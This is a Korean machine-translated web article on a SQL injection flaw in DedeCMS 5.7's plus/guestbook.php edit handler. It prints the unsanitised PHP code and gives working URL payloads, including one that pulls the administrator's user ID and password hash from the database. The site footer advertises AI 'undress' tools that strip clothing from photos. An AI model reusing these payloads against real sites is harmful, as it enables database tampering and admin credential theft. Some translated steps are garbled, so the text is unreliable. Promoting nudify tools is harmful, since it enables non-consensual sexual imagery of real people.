dedecms5.7 최신 SQL은 guestbook.php 주입 취약점을 악용합니다.
이 기사의 내용은 guestbook.php를 사용하는 dedecms5.7의 최신 SQL 주입 취약점에 대한 내용입니다. 이제 필요한 친구들이 참고할 수 있습니다.
해당 버전은 5.7
입니다. 취약점 파일 edit.inc .php 특정 코드:
< ?php
if(!defined('DEDEINC')) exit('Request Error!');
if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS'];
else $GUEST_BOOK_POS = "guestbook.php";
$id = intval($id);
if(empty($job)) $job='view';
if($job=='del' && $g_isadmin)
{
$dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' ");
ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS);
exit();
}
else if($job=='check' && $g_isadmin)
{
$dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' ");
ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS);
exit();
}
else if($job=='editok')
{
$remsg = trim($remsg);
if($remsg!='')
{
//管理员回复不过滤HTML By:Errorera blog:errs.cc
if($g_isadmin)
{
$msg = "<p class='rebox'>".$msg."</p>\n".$remsg;
//$remsg <br /><font color=red>管理员回复:</font> }
else
{
$row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' ");
$oldmsg = "<p class='rebox'>".addslashes($row['msg'])."</p>\n";
$remsg = trimMsg(cn_substrR($remsg, 1024), 1);
$msg = $oldmsg.$remsg;
}
}
//这里没有对$msg过滤,导致可以任意注入了By:Errorera home:www.errs.cc
$dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' ");
ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS);
exit();
}
//home:www.errs.cc
if($g_isadmin)
{
$row = $dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'");
require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm');
}
else
{
$row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'");
require_once(DEDETEMPLATE.'/plus/guestbook-user.htm');
}취약성 성공을 위한 요구 사항:
1.php Magic_quotes_gpc=off
2 취약점 파일이 존재합니다. plus/guestbook.php dede_guestbook 테이블도 존재해야 합니다.
취약점 여부 판단 방법:
먼저 www.xxx.com/plus/guestbook.php를 열면 다른 사람의 메시지를 볼 수 있습니다.
그런 다음 [답글/편집]에 마우스를 올리면 ID를 볼 수 있습니다. 다른 사람의 메시지. 그런 다음 ID를 적어주세요
Visit:
www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=errs.cc'&id=存在的留言ID
제출 후 dede5.7 버전인 경우 "성공적으로 변경되었거나 메시지에 답장했습니다"가 표시됩니다. 이는 수정이 성공했음을 증명합니다
www.xxx.com으로 다시 이동합니다. /plus/guestbook.php 변경한 메시지 ID가 errs.cc'가 되었는지 확인하세요.
그렇다면 취약점을 악용할 수 없음을 증명하고 php Magic_quotes_gpc=off를 켜야 합니다.
변경 사항이 다음과 같다면 성공하지 못하더라도 메시지 ID의 내용은 여전히 입니다. 이전 메시지에서는 취약점이 악용될 수 있음이 입증되었습니다.
그럼 다시 방문
www.xxx.com/plus/guestbook.php?action=admin&job=editok&id=存在的留言ID&msg=',msg=user(),email='
하고 돌아오면 메시지 ID 내용이 mysql user()로 바로 수정됩니다.
아마도 이런 식으로 사용되는 것 같은데, 관심 있으신 분들은 좀 더 공부해 보시기 바랍니다! !
마지막으로 일부 사람들은 관리 백엔드 계정의 비밀번호를 해독하는 방법을 말할 수도 있습니다. 어쨌든 노출은 당연히 가능합니다(노출할 수 없다면 올리지 않겠습니다)! !
view sourceprint?1 /plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='
위 내용은 dedecms5.7 최신 SQL은 guestbook.php 주입 취약점을 악용합니다.의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
AI Hentai Generator
AI Hentai를 무료로 생성하십시오.
인기 기사
뜨거운 도구
메모장++7.3.1
사용하기 쉬운 무료 코드 편집기
SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.
스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경
드림위버 CS6
시각적 웹 개발 도구
SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)
뜨거운 주제
7415
15
1359
52
76
11
23
19
CakePHP 프로젝트 구성
Sep 10, 2024 pm 05:25 PM
이번 장에서는 CakePHP의 환경 변수, 일반 구성, 데이터베이스 구성, 이메일 구성에 대해 알아봅니다.
Ubuntu 및 Debian용 PHP 8.4 설치 및 업그레이드 가이드
Dec 24, 2024 pm 04:42 PM
PHP 8.4는 상당한 양의 기능 중단 및 제거를 통해 몇 가지 새로운 기능, 보안 개선 및 성능 개선을 제공합니다. 이 가이드에서는 Ubuntu, Debian 또는 해당 파생 제품에서 PHP 8.4를 설치하거나 PHP 8.4로 업그레이드하는 방법을 설명합니다.
CakePHP 데이터베이스 작업
Sep 10, 2024 pm 05:25 PM
CakePHP에서 데이터베이스 작업은 매우 쉽습니다. 이번 장에서는 CRUD(생성, 읽기, 업데이트, 삭제) 작업을 이해하겠습니다.
CakePHP 토론
Sep 10, 2024 pm 05:28 PM
CakePHP는 PHP용 오픈 소스 프레임워크입니다. 이는 애플리케이션을 훨씬 쉽게 개발, 배포 및 유지 관리할 수 있도록 하기 위한 것입니다. CakePHP는 강력하고 이해하기 쉬운 MVC와 유사한 아키텍처를 기반으로 합니다. 모델, 뷰 및 컨트롤러 gu
